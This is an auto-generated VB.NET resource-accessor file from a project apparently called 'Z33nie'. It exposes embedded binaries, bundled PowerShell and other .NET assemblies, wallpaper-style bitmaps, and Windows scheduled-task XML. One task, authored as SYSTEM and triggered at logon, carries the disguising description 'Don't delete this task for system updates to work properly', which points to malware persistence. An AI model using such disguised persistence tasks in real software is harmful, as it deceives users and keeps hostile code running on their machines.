'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.34209
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Z33nie.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property _error() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("_error", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property app() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("app", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Cat() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Cat", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property eventmgr() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("eventmgr", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property ExceptionHandler() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("ExceptionHandler", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
        '''&lt;Task version=&quot;1.3&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
        '''  &lt;RegistrationInfo&gt;
        '''    &lt;Date&gt;2016-06-09T22:38:20.6611384&lt;/Date&gt;
        '''    &lt;Author&gt;SYSTEM&lt;/Author&gt;
        '''    &lt;Description&gt;*Don&apos;t delete this task for system updates to work properly*&lt;/Description&gt;
        '''  &lt;/RegistrationInfo&gt;
        '''  &lt;Triggers&gt;
        '''    &lt;LogonTrigger&gt;
        '''      &lt;Enabled&gt;true&lt;/Enabled&gt;
        '''    &lt;/LogonTrigger&gt;
        '''  &lt;/Triggers&gt;
        '''  &lt;Principals&gt;
        '''    &lt;Principal id=&quot;Author&quot;&gt;
        '''.
        '''</summary>
        Friend ReadOnly Property SysConfigDataINIT() As String
            Get
                Return ResourceManager.GetString("SysConfigDataINIT", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property syslog32() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("syslog32", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property syslog64() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("syslog64", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property System_Core() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("System_Core", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property System_Drawing() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("System_Drawing", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property System_Management_Automation() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("System_Management_Automation", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property System_Windows_Forms() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("System_Windows_Forms", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property System_XML() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("System_XML", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property System_Xml_Linq() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("System_Xml_Linq", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
        '''&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
        '''  &lt;RegistrationInfo&gt;
        '''    &lt;Date&gt;2016-07-19T20:48:21.7229273&lt;/Date&gt;
        '''    &lt;Author&gt;SYSTEM&lt;/Author&gt;
        '''  &lt;/RegistrationInfo&gt;
        '''  &lt;Triggers&gt;
        '''    &lt;RegistrationTrigger&gt;
        '''      &lt;Enabled&gt;true&lt;/Enabled&gt;
        '''    &lt;/RegistrationTrigger&gt;
        '''  &lt;/Triggers&gt;
        '''  &lt;Principals&gt;
        '''    &lt;Principal id=&quot;Author&quot;&gt;
        '''.
        '''</summary>
        Friend ReadOnly Property TempCacheflush() As String
            Get
                Return ResourceManager.GetString("TempCacheflush", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property wall() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("wall", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
    End Module
End Namespace
